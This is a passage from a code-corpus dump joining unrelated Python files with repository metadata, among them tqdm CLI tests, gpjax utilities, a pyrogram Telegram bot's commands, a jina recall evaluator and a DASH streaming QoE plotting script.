                'wav_raw': _bytes_feature(wav_raw),
                'noisy_raw': _bytes_feature(noisy_raw),
                'baseline_raw': _bytes_feature(baseline_raw)
            }))
            out_file.write(example.SerializeToString())
def main(opts):
    """Build one TFRecords file of paired clean/noisy (and optionally
    baseline) wav slices, as described by the datasets in ``opts.cfg``.

    :param opts: parsed argparse namespace (cfg, save_path, out_file,
                 force_gen).
    """
    if not os.path.exists(opts.save_path):
        # make save path if it does not exist
        os.makedirs(opts.save_path)
    # set up the output filepath
    out_filepath = os.path.join(opts.save_path, opts.out_file)
    if os.path.splitext(out_filepath)[1] != '.tfrecords':
        # if wrong extension or no extension appended, put .tfrecords
        out_filepath += '.tfrecords'
    else:
        out_filename, ext = os.path.splitext(out_filepath)
        out_filepath = out_filename + ext
    # check if out_file exists and if force flag is set
    if os.path.exists(out_filepath) and not opts.force_gen:
        raise ValueError('ERROR: {} already exists. Set force flag (--force-gen) to '
                         'overwrite. Skipping this speaker.'.format(out_filepath))
    elif os.path.exists(out_filepath) and opts.force_gen:
        print('Will overwrite previously existing tfrecords')
        os.unlink(out_filepath)
    with open(opts.cfg) as cfh:
        # read the configuration description
        cfg_desc = toml.loads(cfh.read())
        beg_enc_t = timeit.default_timer()
        out_file = tf.python_io.TFRecordWriter(out_filepath)
        # Process each dataset section.  NOTE: .values() replaces the
        # Python-2-only cfg_desc.iteritems(), which raises AttributeError on
        # Python 3; .values() works on both (dataset name was unused anyway).
        for dset_desc in cfg_desc.values():
            print('-' * 50)
            wav_dir = dset_desc['clean']
            wav_files = [os.path.join(wav_dir, wav) for wav in
                         os.listdir(wav_dir) if wav.endswith('.wav')]
            noisy_dir = dset_desc['noisy']
            baseline_dir = None
            if 'baseline' in dset_desc.keys():
                baseline_dir = dset_desc['baseline']
            nfiles = len(wav_files)
            for m, wav_file in enumerate(wav_files):
                print('Processing wav file {}/{} {}{}'.format(m + 1,
                                                              nfiles,
                                                              wav_file,
                                                              ' ' * 10),
                      end='\r')
                sys.stdout.flush()
                encoder_proc(wav_file, noisy_dir, out_file, 2 ** 14, baseline_dir)
        out_file.close()
        end_enc_t = timeit.default_timer() - beg_enc_t
        print('')
        print('*' * 50)
        print('Total processing and writing time: {} s'.format(end_enc_t))
if __name__ == '__main__':
    # CLI entry point: parse options and build the TFRecords dataset.
    parser = argparse.ArgumentParser(description='Convert the set of txt and '
                                     'wavs to TFRecords')
    parser.add_argument('--cfg', type=str, default='cfg/e2e_maker.cfg',
                        help='File containing the description of datasets '
                             'to extract the info to make the TFRecords.')
    parser.add_argument('--save_path', type=str, default='data/',
                        help='Path to save the dataset')
    parser.add_argument('--out_file', type=str, default='segan.tfrecords',
                        help='Output filename')
    parser.add_argument('--force-gen', dest='force_gen', action='store_true',
                        help='Flag to force overwriting existing dataset.')
    parser.set_defaults(force_gen=False)
    opts = parser.parse_args()
    main(opts)
| 2.296875 | 2 |
software.py | schamberg97/bullshitMgimoProj | 0 | 17626 | <reponame>schamberg97/bullshitMgimoProj
from myShop import MyShop
from myBot import MYBOT
from sMenu import Menu
class software:
    """Entry points for the shop demo: table browser and recommendation bot."""
    @staticmethod
    def runShowTables():
        # import the XML library
        import xml.dom.minidom as minidom
        from sMenu import Menu
        # read the XML from file
        dom = minidom.parse("myShop.xml")
        dom.normalize()
        # print every (id, name) row of the chosen table
        def listTable(what,whatSub):
            pars=dom.getElementsByTagName(what)[0]
            # read the child elements of the table
            nodes=pars.getElementsByTagName(whatSub)
            # print the elements to the screen
            for node in nodes:
                # NOTE(review): `id` shadows the builtin id() inside this loop
                id = node.getElementsByTagName("id")[0]
                name = node.getElementsByTagName("name")[0]
                print(id.firstChild.data, name.firstChild.data)
        menu_items=["Категории", "Цвета", "Адреса", "Материал", "Сезон", "Товар"]
        menu_actions=['categories','colors', 'cities', 'materials', 'seasons', 'products'] # customer and order tables are deliberately not offered ;)
        menu_actions_nodes=['category','color', 'city', 'material', 'season', 'product']
        menu_title="Смотреть таблицу"
        my_menu=Menu(menu_title, menu_items)
        choice=my_menu.get_user_choice()
        listTable(menu_actions[choice-1], menu_actions_nodes[choice-1])
    @staticmethod
    def run():
        # create the product shop
        myShop=MyShop("myShop.xml")
        #myShop.printProduct()
        # add sample data
        myShop.addSampleData(30, 30, 500)
        #myShop.printProduct()
        myShop.saveXML("new.xml")
        # create the bot
        bot=MYBOT(myShop)
        # train the bot
        bot.botTraining(0)
        # collect the user's preferences
        print('Для выхода - нажмите Ctrl-C')
        sd=bot.getUserChoice()
        # build and print the recommended product
        print("Ваш рекомендованный товар: ",bot.getPrecigion(sd))
examples/basic.py | EmbarkStudios/Python-xNormal | 52 | 17627 | import xNormal
# Bake 256x256 normal and ambient-occlusion maps from the high-poly piano
# mesh onto the low-poly mesh, writing the result to piano.png.
xNormal.run("piano_high.obj", "piano_low.obj", "piano.png", width=256, height=256, gen_normals = True, gen_ao = True)
jina/executors/evaluators/rank/recall.py | yk/jina | 0 | 17628 | <reponame>yk/jina
from typing import Sequence, Any, Optional
from . import BaseRankingEvaluator
class RecallEvaluator(BaseRankingEvaluator):
    """A :class:`RecallEvaluator` evaluates the Recall of the search.
    It computes how many of the first `eval_at` matches appear in the
    groundtruth, as a fraction of the total number of groundtruth documents.
    (The metric name is ``Recall@N``; the previous docstring wrongly said
    Precision.)
    """
    metric = 'Recall@N'
    def __init__(self,
                 eval_at: Optional[int] = None,
                 *args, **kwargs):
        """
        :param eval_at: the point at which evaluation is computed; if None is given, all the input is considered
        """
        super().__init__(*args, **kwargs)
        self.eval_at = eval_at
    def evaluate(self, actual: Sequence[Any], desired: Sequence[Any], *args, **kwargs) -> float:
        """
        :param actual: the matched document identifiers from the request as matched by jina indexers and rankers
        :param desired: the expected documents matches ids sorted as they are expected
        :return: the evaluation metric value for the request document
        """
        if self.eval_at == 0:
            return 0.0
        actual_at_k = actual[:self.eval_at] if self.eval_at else actual
        # recall = |groundtruth found in top-k| / |groundtruth|
        # NOTE(review): raises ZeroDivisionError when `desired` is empty --
        # confirm upstream guarantees non-empty groundtruth.
        ret = len(set(actual_at_k).intersection(set(desired)))
        return ret / len(desired)
| 2.78125 | 3 |
tests/tests_main.py | insilications/tqdm-clr | 22,617 | 17629 | <filename>tests/tests_main.py
"""Test CLI usage."""
import logging
import subprocess # nosec
import sys
from functools import wraps
from os import linesep
from tqdm.cli import TqdmKeyError, TqdmTypeError, main
from tqdm.utils import IS_WIN
from .tests_tqdm import BytesIO, _range, closing, mark, raises
def restore_sys(func):
    """Decorates `func(capsysbin)` to save & restore `sys.(stdin|argv)`."""
    @wraps(func)
    def wrapper(capsysbin):
        """Run `func`, then put `sys.stdin` and `sys.argv` back."""
        saved_stdin, saved_argv = sys.stdin, sys.argv
        try:
            return func(capsysbin)
        finally:
            sys.stdin, sys.argv = saved_stdin, saved_argv
    return wrapper
def norm(bytestr):
    """Normalise line endings (platform linesep -> b"\\n")."""
    if linesep == "\n":
        return bytestr
    return bytestr.replace(linesep.encode(), b"\n")
@mark.slow
def test_pipes():
    """Test command line pipes"""
    ls_out = subprocess.check_output(['ls']) # nosec
    ls = subprocess.Popen(['ls'], stdout=subprocess.PIPE) # nosec
    # Feed the `ls` output through the tqdm CLI used as a filter.
    res = subprocess.Popen( # nosec
        [sys.executable, '-c', 'from tqdm.cli import main; main()'],
        stdin=ls.stdout, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    out, err = res.communicate()
    assert ls.poll() == 0
    # actual test: stdout passes through unchanged; progress bar is on stderr
    assert norm(ls_out) == norm(out)
    assert b"it/s" in err
# Popen leaves ls.stdout open; silence the ResourceWarning on 3.8+.
if sys.version_info[:2] >= (3, 8):
    test_pipes = mark.filterwarnings("ignore:unclosed file:ResourceWarning")(
        test_pipes)
def test_main_import():
    """Test main CLI import"""
    N = 123
    _SYS = sys.stdin, sys.argv
    # test direct import: importing tqdm.__main__ runs the CLI immediately,
    # so stdin/argv are staged first and restored afterwards.
    sys.stdin = [str(i).encode() for i in _range(N)]
    sys.argv = ['', '--desc', 'Test CLI import',
                '--ascii', 'True', '--unit_scale', 'True']
    try:
        import tqdm.__main__  # NOQA, pylint: disable=unused-variable
    finally:
        sys.stdin, sys.argv = _SYS
@restore_sys
def test_main_bytes(capsysbin):
    """Test CLI --bytes (and --delim with NUL-separated binary input)"""
    N = 123
    # test --delim
    IN_DATA = '\0'.join(map(str, _range(N))).encode()
    with closing(BytesIO()) as sys.stdin:
        sys.stdin.write(IN_DATA)
        # sys.stdin.write(b'\xff') # TODO
        sys.stdin.seek(0)
        main(sys.stderr, ['--desc', 'Test CLI delim', '--ascii', 'True',
                          '--delim', r'\0', '--buf_size', '64'])
    out, err = capsysbin.readouterr()
    assert out == IN_DATA
    # all N NUL-delimited items should have been counted
    assert str(N) + "it" in err.decode("U8")
    # test --bytes
    IN_DATA = IN_DATA.replace(b'\0', b'\n')
    with closing(BytesIO()) as sys.stdin:
        sys.stdin.write(IN_DATA)
        sys.stdin.seek(0)
        main(sys.stderr, ['--ascii', '--bytes=True', '--unit_scale', 'False'])
    out, err = capsysbin.readouterr()
    assert out == IN_DATA
    # byte mode counts bytes ("B"), not items
    assert str(len(IN_DATA)) + "B" in err.decode("U8")
@mark.skipif(sys.version_info[0] == 2, reason="no caplog on py2")
def test_main_log(capsysbin, caplog):
    """Test CLI --log"""
    _SYS = sys.stdin, sys.argv
    N = 123
    sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
    IN_DATA = b''.join(sys.stdin)
    try:
        # at INFO level no log records should be produced...
        with caplog.at_level(logging.INFO):
            main(sys.stderr, ['--log', 'INFO'])
            out, err = capsysbin.readouterr()
            assert norm(out) == IN_DATA and b"123/123" in err
            assert not caplog.record_tuples
        # ...but at DEBUG level some should be.
        with caplog.at_level(logging.DEBUG):
            main(sys.stderr, ['--log', 'DEBUG'])
            out, err = capsysbin.readouterr()
            assert norm(out) == IN_DATA and b"123/123" in err
            assert caplog.record_tuples
    finally:
        sys.stdin, sys.argv = _SYS
@restore_sys
def test_main(capsysbin):
    """Test misc CLI options (--tee, --null, --update, --update-to, --delim)"""
    N = 123
    sys.stdin = [(str(i) + '\n').encode() for i in _range(N)]
    IN_DATA = b''.join(sys.stdin)
    # test --tee
    main(sys.stderr, ['--mininterval', '0', '--miniters', '1'])
    out, err = capsysbin.readouterr()
    assert norm(out) == IN_DATA and b"123/123" in err
    # one \r-terminated bar refresh per item (plus a few extra lines)
    assert N <= len(err.split(b"\r")) < N + 5
    len_err = len(err)
    main(sys.stderr, ['--tee', '--mininterval', '0', '--miniters', '1'])
    out, err = capsysbin.readouterr()
    assert norm(out) == IN_DATA and b"123/123" in err
    # spaces to clear intermediate lines could increase length
    assert len_err + len(norm(out)) <= len(err)
    # test --null
    main(sys.stderr, ['--null'])
    out, err = capsysbin.readouterr()
    assert not out and b"123/123" in err
    # test integer --update: input values are summed (0+1+...+122 == N//2*N)
    main(sys.stderr, ['--update'])
    out, err = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum formula"
    # test integer --update_to: counter ends at the last value (N-1)
    main(sys.stderr, ['--update-to'])
    out, err = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    assert (str(N - 1) + "it").encode() in err
    assert (str(N) + "it").encode() not in err
    with closing(BytesIO()) as sys.stdin:
        sys.stdin.write(IN_DATA.replace(b'\n', b'D'))
        # test integer --update --delim
        sys.stdin.seek(0)
        main(sys.stderr, ['--update', '--delim', 'D'])
        out, err = capsysbin.readouterr()
        assert out == IN_DATA.replace(b'\n', b'D')
        assert (str(N // 2 * N) + "it").encode() in err, "expected arithmetic sum"
        # test integer --update_to --delim
        sys.stdin.seek(0)
        main(sys.stderr, ['--update-to', '--delim', 'D'])
        out, err = capsysbin.readouterr()
        assert out == IN_DATA.replace(b'\n', b'D')
        assert (str(N - 1) + "it").encode() in err
        assert (str(N) + "it").encode() not in err
    # test float --update_to
    sys.stdin = [(str(i / 2.0) + '\n').encode() for i in _range(N)]
    IN_DATA = b''.join(sys.stdin)
    main(sys.stderr, ['--update-to'])
    out, err = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    assert (str((N - 1) / 2.0) + "it").encode() in err
    assert (str(N / 2.0) + "it").encode() not in err
@mark.slow
@mark.skipif(IS_WIN, reason="no manpages on windows")
def test_manpath(tmp_path):
    """Test CLI --manpath"""
    man = tmp_path / "tqdm.1"
    assert not man.exists()
    # --manpath installs the manpage and then exits via SystemExit
    with raises(SystemExit):
        main(argv=['--manpath', str(tmp_path)])
    assert man.is_file()
@mark.slow
@mark.skipif(IS_WIN, reason="no completion on windows")
def test_comppath(tmp_path):
    """Test CLI --comppath"""
    man = tmp_path / "tqdm_completion.sh"
    assert not man.exists()
    # --comppath writes the shell-completion script and exits via SystemExit
    with raises(SystemExit):
        main(argv=['--comppath', str(tmp_path)])
    assert man.is_file()
    # check most important options appear
    script = man.read_text()
    opts = {'--help', '--desc', '--total', '--leave', '--ncols', '--ascii',
            '--dynamic_ncols', '--position', '--bytes', '--nrows', '--delim',
            '--manpath', '--comppath'}
    assert all(args in script for args in opts)
@restore_sys
def test_exceptions(capsysbin):
    """Test CLI Exceptions"""
    N = 123
    sys.stdin = [str(i) + '\n' for i in _range(N)]
    IN_DATA = ''.join(sys.stdin).encode()
    # unknown long option
    with raises(TqdmKeyError, match="bad_arg_u_ment"):
        main(sys.stderr, argv=['-ascii', '-unit_scale', '--bad_arg_u_ment', 'foo'])
    out, _ = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    # wrong value type for a bool option
    with raises(TqdmTypeError, match="invalid_bool_value"):
        main(sys.stderr, argv=['-ascii', '-unit_scale', 'invalid_bool_value'])
    out, _ = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    # wrong value type for an int option
    with raises(TqdmTypeError, match="invalid_int_value"):
        main(sys.stderr, argv=['-ascii', '--total', 'invalid_int_value'])
    out, _ = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    # mutually exclusive options
    with raises(TqdmKeyError, match="Can only have one of --"):
        main(sys.stderr, argv=['--update', '--update_to'])
    out, _ = capsysbin.readouterr()
    assert norm(out) == IN_DATA
    # test SystemExits
    for i in ('-h', '--help', '-v', '--version'):
        with raises(SystemExit):
            main(argv=[i])
| 2.359375 | 2 |
plugins/commands.py | Kalpesh0/Project01 | 0 | 17630 | <reponame>Kalpesh0/Project01
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @REQUEST_M0viz
from pyrogram import Client, filters
from pyrogram.types import InlineKeyboardMarkup, InlineKeyboardButton
from script import script
@Client.on_message(filters.command(["start"]) & filters.private)
async def start(client, message):
    """Reply to /start in private chat with the welcome text and buttons."""
    try:
        await message.reply_text(
            text=script.START_MSG.format(message.from_user.mention),
            disable_web_page_preview=True,
            reply_markup=InlineKeyboardMarkup(
                [
                    [
                        InlineKeyboardButton("HELP", callback_data="help_data"),
                        InlineKeyboardButton("ABOUT", callback_data="about_data"),
                    ],
                    [
                        InlineKeyboardButton(
                            "🖤JOIN SUPPORT GROUP🖤", url="https://t.me/REQUEST_M0viz")
                    ]
                ]
            ),
            reply_to_message_id=message.message_id
        )
    except Exception:
        # Best-effort: ignore send failures (e.g. blocked bot).  Narrowed
        # from a bare `except:` that also swallowed SystemExit and
        # KeyboardInterrupt.
        pass
@Client.on_message(filters.command(["help"]) & filters.private)
async def help(client, message):
    """Reply to /help in private chat with the help text and buttons."""
    try:
        await message.reply_text(
            text=script.HELP_MSG,
            disable_web_page_preview=True,
            reply_markup=InlineKeyboardMarkup(
                [
                    [
                        InlineKeyboardButton("BACK", callback_data="start_data"),
                        InlineKeyboardButton("ABOUT", callback_data="about_data"),
                    ],
                    [
                        InlineKeyboardButton(
                            "💕DONATE US 💕", url="https://t.me/Harshsoni_08")
                    ]
                ]
            ),
            reply_to_message_id=message.message_id
        )
    except Exception:
        # Best-effort: ignore send failures.  Narrowed from a bare `except:`
        # that also swallowed SystemExit and KeyboardInterrupt.
        pass
@Client.on_message(filters.command(["about"]) & filters.private)
async def about(client, message):
    """Reply to /about in private chat with the about text and buttons."""
    try:
        await message.reply_text(
            text=script.ABOUT_MSG,
            disable_web_page_preview=True,
            reply_markup=InlineKeyboardMarkup(
                [
                    [
                        InlineKeyboardButton("BACK", callback_data="help_data"),
                        InlineKeyboardButton("START", callback_data="start_data"),
                    ],
                    [
                        InlineKeyboardButton(
                            "SHARE OUR GROUP 🖤🤙", url="http://t.me/share/url?url=Hey%20There%E2%9D%A4%EF%B8%8F%2C%0A%20%0A%20I%20Found%20A%20Really%20Awesome%20Group%20%20For%20Searching%20Movies%20Hope%20You%20will%20Join%20This%20Group%20Too😁😁👍%E2%9D%A4%EF%B8%8F%E2%9D%A4%EF%B8%8F%E2%9D%A4%EF%B8%8F%0A%20%0A%20Group%20Sharing%20Username%20Link%20%3A-%20%40REQUEST_M0viz")
                    ]
                ]
            ),
            reply_to_message_id=message.message_id
        )
    except Exception:
        # Best-effort: ignore send failures.  Narrowed from a bare `except:`
        # that also swallowed SystemExit and KeyboardInterrupt.
        pass
| 2.34375 | 2 |
gpjax/utils.py | thomaspinder/GPJax | 44 | 17631 | from copy import deepcopy
from typing import Tuple
import jax.numpy as jnp
from jax.scipy.linalg import cho_factor, cho_solve
from multipledispatch import dispatch
from .types import Array
def I(n: int) -> Array:
    """Construct an identity matrix.

    :param n: The number of rows (and columns) of the matrix.
    :return: The n x n identity matrix.
    """
    return jnp.identity(n)
def concat_dictionaries(a: dict, b: dict) -> dict:
    """Merge two dictionaries into a new one.

    On duplicate keys the value from ``b`` wins, mirroring ``{**a, **b}``.
    """
    merged = dict(a)
    merged.update(b)
    return merged
def merge_dictionaries(base_dict: dict, in_dict: dict) -> dict:
    """Overwrite values of ``base_dict`` for keys also present in ``in_dict``.

    ``base_dict`` defines the complete key set; keys that exist only in
    ``in_dict`` are ignored.  The update happens in place and ``base_dict``
    is also returned for convenience.

    :param base_dict: Complete dictionary of key-value pairs.
    :param in_dict: Subset of key-value pairs whose values take precedence.
    :return: The merged dictionary (same object as ``base_dict``).
    """
    for key in base_dict:
        if key in in_dict:
            base_dict[key] = in_dict[key]
    return base_dict
def sort_dictionary(base_dict: dict) -> dict:
    """Return a copy of ``base_dict`` with entries ordered alphabetically by key.

    :param base_dict: The unsorted dictionary.
    :return: A new dictionary sorted on the keys.
    """
    return {key: base_dict[key] for key in sorted(base_dict)}
@dispatch(jnp.DeviceArray)
def standardise(x: jnp.DeviceArray) -> Tuple[jnp.DeviceArray, jnp.DeviceArray, jnp.DeviceArray]:
    """Standardise a matrix column-wise to zero mean and unit variance.

    Intended for a training set; the computed statistics are returned so a
    test set can later be standardised consistently.

    :param x: A matrix of unstandardised values.
    :return: The standardised matrix plus the column means and standard deviations.
    """
    mean = jnp.mean(x, axis=0)
    std = jnp.std(x, axis=0)
    return (x - mean) / std, mean, std
@dispatch(jnp.DeviceArray, jnp.DeviceArray, jnp.DeviceArray)
def standardise(
    x: jnp.DeviceArray, xmean: jnp.DeviceArray, xstd: jnp.DeviceArray
) -> jnp.DeviceArray:
    """Standardise a matrix using precomputed statistics.

    Primarily for mapping a test set onto the scale learned from the
    training data.

    :param x: A matrix of unstandardised values.
    :param xmean: A precomputed mean vector.
    :param xstd: A precomputed standard deviation vector.
    :return: A matrix of standardised values.
    """
    centred = x - xmean
    return centred / xstd
def unstandardise(
    x: jnp.DeviceArray, xmean: jnp.DeviceArray, xstd: jnp.DeviceArray
) -> jnp.DeviceArray:
    """Map a standardised matrix back onto its original scale.

    Inverse of :func:`standardise`: multiplies by the stored standard
    deviation and adds back the mean.

    :param x: A standardised matrix.
    :param xmean: A mean vector.
    :param xstd: A standard deviation vector.
    :return: A matrix of unstandardised values.
    """
    rescaled = x * xstd
    return rescaled + xmean
def as_constant(parameter_set: dict, params: list) -> Tuple[dict, dict]:
    """
    Split a parameter dictionary into free and constant parameters.

    :param parameter_set: The full parameter dictionary (left unmodified).
    :param params: Keys to treat as constants.
    :return: A tuple ``(free_params, constant_params)`` where the constant
        keys have been moved out of a deep copy of the parameter set.
    """
    free_params = deepcopy(parameter_set)
    constant_params = {name: free_params.pop(name) for name in params}
    return free_params, constant_params
| 2.65625 | 3 |
tools/replace_version.py | jasmcaus/image-deep-learning-keras | 681 | 17632 | import os
def replace_version(old_version, new_version):
    """
    Rewrite every 'version X.Y.Z' marker under ../caer from the old
    version to the new one, printing each rewritten file.

    :param old_version: Current version as a tuple, e.g. ``(1, 2, 3)``.
    :param new_version: Replacement version as a tuple.
    :raises ValueError: If either argument is not a tuple.
    """
    if not isinstance(old_version, tuple) or not isinstance(new_version, tuple):
        raise ValueError("`old_version` and `new_version` must be a version tuple. Eg: (1.2.3)")
    major, minor, micro = old_version[:3]
    old_str = f'{major}.{minor}.{micro}'
    major, minor, micro = new_version[:3]
    new_str = f'{major}.{minor}.{micro}'
    print(f"New version = {new_str}")
    source_extensions = ('.py', '.cpp', '.c', '.h', '.hpp')
    for root, _, files in os.walk('../caer'):
        for name in files:
            if not name.endswith(source_extensions):
                continue
            full_path = os.path.abspath(os.path.join(root, name))
            with open(full_path, 'r') as fh:
                updated_text = fh.read().replace('version ' + old_str, 'version ' + new_str)
            with open(full_path, 'w') as fh:
                print(full_path)
                fh.write(updated_text)
replace_version((1,8,0), (3,9,1))
| 3.125 | 3 |
DashExperiments/make_plot.py | magruener/reconstructing-proprietary-video-streaming-algorithms | 9 | 17633 | import argparse
import math
import matplotlib.pyplot as plt
import os
import numpy as np
import shutil
import pandas as pd
import seaborn as sns
# Global plotting style: seaborn defaults with the larger "talk" context.
sns.set()
sns.set_context("talk")
# Histogram bin count; not referenced below — TODO confirm still needed.
NUM_BINS = 100
# Per-chunk VMAF table for the Pensieve test video.
path = '../Data/Video_Info/Pensieve_Info/PenieveVideo_video_info'
# Maps a bitrate level (kbps, as a string) to its VMAF column in the table.
video_mappings = {}
video_mappings['300'] = '320x180x30_vmaf_score'
video_mappings['750'] = '640x360x30_vmaf_score'
video_mappings['1200'] = '768x432x30_vmaf_score'
video_mappings['1850'] = '1024x576x30_vmaf_score'
video_mappings['2850'] = '1280x720x30_vmaf_score'
video_mappings['4300'] = '1280x720x60_vmaf_score'
# Metrics collected per (abr, trace) experiment by get_qoe().
metric_list = ["reward_vmaf", "reward_br", "rebuf", "br_avg", "vmaf_avg", "switching_vmaf", "switching_br"]
#MINERVA
# Minerva-style QoE constants: rebuffering penalty, quality-switch penalty,
# and nominal segment length in seconds.
rebuf_penalty = 25
switching_penalty = 2.5
# NOTE(review): spelling "lenght" kept — this exact name is used below.
segment_lenght = 4.0
def load_csv():
    """Load the Pensieve per-chunk VMAF table from the module-level ``path``."""
    return pd.read_csv(path)
pensieve_video_csv = load_csv()
def get_qoe(abr, trace):
    """
    Parse one experiment's reward log and compute its QoE metrics.

    Reads ``<result_dir>/<abr>-<trace>/result/<abr>_rewards_0.log``; the first
    line only seeds the "previous" bitrate/VMAF values, every later line
    contributes to the accumulated rewards, rebuffering and switching totals.

    :param abr: ABR algorithm name.
    :param trace: Network trace name.
    :return: ``(reward_vmaf, reward_bitrate, total_rebuffering,
        switching_br, switching_vmaf, vmaf_avg, br_avg)``, or seven ``None``
        values when the log does not contain exactly ``args.video_chunks``
        lines.
    """
    logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
    logfile = os.path.join(logdir, abr + "_rewards_0.log")
    reward_vmaf = 0
    reward_bitrate = 0
    total_rebuffering = 0.0
    vmaf_avg = 0.0
    vmaf_switching_avg = 0.0
    bitrate_avg = 0.0
    bitrate_switching_avg = 0.0
    with open(logfile, "r") as fin:
        reward_lines = fin.readlines()
        if (len(reward_lines) != args.video_chunks):
            # Short logs are remembered so clean() can delete them later.
            if len(reward_lines) < args.video_chunks:
                to_clean.append(logfile)
            print("{} has {} chunks instead of {}".format(logfile, len(reward_lines), args.video_chunks))
            print("Skip, please")
            return None, None, None, None, None, None, None
        for i, r_line in enumerate(reward_lines):
            # Assumed log columns: data[1] = bitrate (kbps), data[3] =
            # rebuffer time, data[-1] = per-chunk bitrate reward —
            # TODO confirm against the log writer.
            data = r_line.split()
            if i == 0:
                br = int(data[1])
                br_previous = br
                vmaf_previous = pensieve_video_csv.loc[i, video_mappings[str(br)]]
            else: # skip first
                br = int(data[1])
                bitrate_avg += br
                bitrate_switching_avg += abs(br - br_previous)
                reward_bitrate += float(data[-1])
                total_rebuffering += float(data[3])
                # VMAF of this chunk at the chosen bitrate level.
                vmaf_current = pensieve_video_csv.loc[i, video_mappings[str(br)]]
                vmaf_avg += vmaf_current
                vmaf_switching_avg += abs(vmaf_current - vmaf_previous)
                # Minerva-style QoE: quality - rebuffer penalty - switch penalty.
                reward_vmaf += (float(vmaf_current) -
                                rebuf_penalty*(float(data[3])) -
                                switching_penalty*(abs(vmaf_current - vmaf_previous)))
                vmaf_previous = vmaf_current
                br_previous = br
    # NOTE(review): vmaf_avg is normalised by segment_lenght*chunks while
    # br_avg is divided by chunks only — looks inconsistent; confirm intent.
    return reward_vmaf,\
        reward_bitrate,\
        total_rebuffering,\
        bitrate_switching_avg/(segment_lenght*args.video_chunks),\
        vmaf_switching_avg/(segment_lenght*args.video_chunks),\
        vmaf_avg/(segment_lenght*args.video_chunks),\
        bitrate_avg/args.video_chunks
#
#def get_qoe(abr, trace):
# logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
# logfile = os.path.join(logdir, abr + "_rewards_0.log")
#
# reward = 0
#
#
# with open(logfile, "r") as fin:
# reward_lines = fin.readlines()
#
# if (len(reward_lines) != args.video_chunks):
# if len(reward_lines) < args.video_chunks:
# to_clean.append(logfile)
# print("{} has {} chunks instead of {}".format(logfile, len(reward_lines), args.video_chunks))
# print("Skip, please")
# return None
#
# for i, r_line in enumerate(reward_lines):
# if i > 0: # skip first
# reward += float(r_line.split()[-1])
#
# return reward
def get_qoes(abrs_list, traces_list):
    """
    Collect per-trace QoE metrics for every ABR algorithm.

    :param abrs_list: ABR algorithm names.
    :param traces_list: Network trace names.
    :return: Mapping ``abr -> {metric_name: [per-trace values]}``; traces
        whose logs are incomplete (get_qoe returned None) are skipped.
    """
    global_results = {}
    for abr in abrs_list:
        # BUG FIX: the original assigned `global_results[abr] = []` and then
        # immediately overwrote it with a dict; the dead assignment is gone.
        # One list per metric, filled with one value per successful trace.
        global_results[abr] = {metric: [] for metric in metric_list}
        for trace in traces_list:
            reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)
            if reward_vmaf is None:
                continue
            global_results[abr]['reward_vmaf'].append(reward_vmaf)
            global_results[abr]['reward_br'].append(reward_br)
            global_results[abr]['rebuf'].append(rebuf)
            global_results[abr]['switching_br'].append(switching_br)
            global_results[abr]['switching_vmaf'].append(switching_vmaf)
            global_results[abr]['vmaf_avg'].append(vmaf_avg)
            global_results[abr]['br_avg'].append(br_avg)
    return global_results
def get_qoes_partial(abrs_list, traces_list):
    """
    Like get_qoes(), but only processes experiments whose result directory
    already exists, reports progress, and drops ABRs with no completed
    experiment from the returned mapping.

    :param abrs_list: ABR algorithm names.
    :param traces_list: Network trace names.
    :return: Mapping ``abr -> {metric_name: [per-trace values]}``.
    """
    total_experiments_expected = len(args.abrs) * len(args.traces)
    experiments_executed_so_far = 0
    partial_results = {}
    for abr in abrs_list:
        partial_results[abr] = {metric: [] for metric in metric_list}
        for trace in traces_list:
            logdir = os.path.join(args.result_dir, abr + "-" + trace, "result")
            if not os.path.exists(logdir):
                continue
            reward_vmaf, reward_br, rebuf, switching_br, switching_vmaf, vmaf_avg, br_avg = get_qoe(abr, trace)
            if reward_vmaf is not None:
                partial_results[abr]['reward_vmaf'].append(reward_vmaf)
                partial_results[abr]['reward_br'].append(reward_br)
                partial_results[abr]['rebuf'].append(rebuf)
                partial_results[abr]['switching_br'].append(switching_br)
                partial_results[abr]['switching_vmaf'].append(switching_vmaf)
                partial_results[abr]['vmaf_avg'].append(vmaf_avg)
                partial_results[abr]['br_avg'].append(br_avg)
                experiments_executed_so_far += 1
        # BUG FIX: the original tested `partial_results[abr] == []`, which is
        # always False for a dict, so empty entries were never removed.
        if not partial_results[abr]['reward_vmaf']:
            del partial_results[abr]
    print("Experiment executed: {}/{}".format(experiments_executed_so_far, total_experiments_expected))
    return partial_results
def plot_cdf(results, reward_key):
    """
    Save a CDF plot of ``reward_key`` across traces, one curve per scheme.

    Rewards are normalised by the absolute mean reward of the best scheme,
    so the best scheme's curve is centred around 1.

    :param results: Mapping ``scheme -> {metric: [values]}``.
    :param reward_key: Which reward metric to plot.
    """
    fig = plt.figure(figsize=(16.0, 10.0))
    ax = fig.add_subplot(111)
    def average_of_the_best():
        # Find the scheme with the highest mean reward; its |mean| becomes
        # the normalisation constant for every curve.
        avg_best = -1000000000000
        abr_best = ''
        for scheme in results.keys():
            avg_tmp = np.mean(results[scheme][reward_key])
            if avg_best < avg_tmp:
                avg_best = avg_tmp
                abr_best = scheme
        print("Best provider in average is {} with {}".format(abr_best, avg_best))
        return abs(avg_best)
    schemes = []
    norm = average_of_the_best()
    markers = ['.', ',', 'o', 'v', '^', '>', '<', 's', 'x', 'D', 'd', '*', '_', '']
    for i, scheme in enumerate(results.keys()):
        # Empirical CDF: one histogram bin per sample, then a cumulative sum.
        # (The comprehension-local `i` does not clobber the enumerate index
        # used for marker selection — comprehensions have their own scope.)
        values = [float(i)/norm for i in results[scheme][reward_key]]
        values, base = np.histogram(values, bins=len(values))
        cumulative = np.cumsum(values)
        cumulative = [float(i) / len(values) * 100 for i in cumulative]
        marker_index = i % len(markers)
        ax.plot(base[:-1], cumulative, linewidth=3, marker=markers[marker_index], markevery=2, markersize=15)
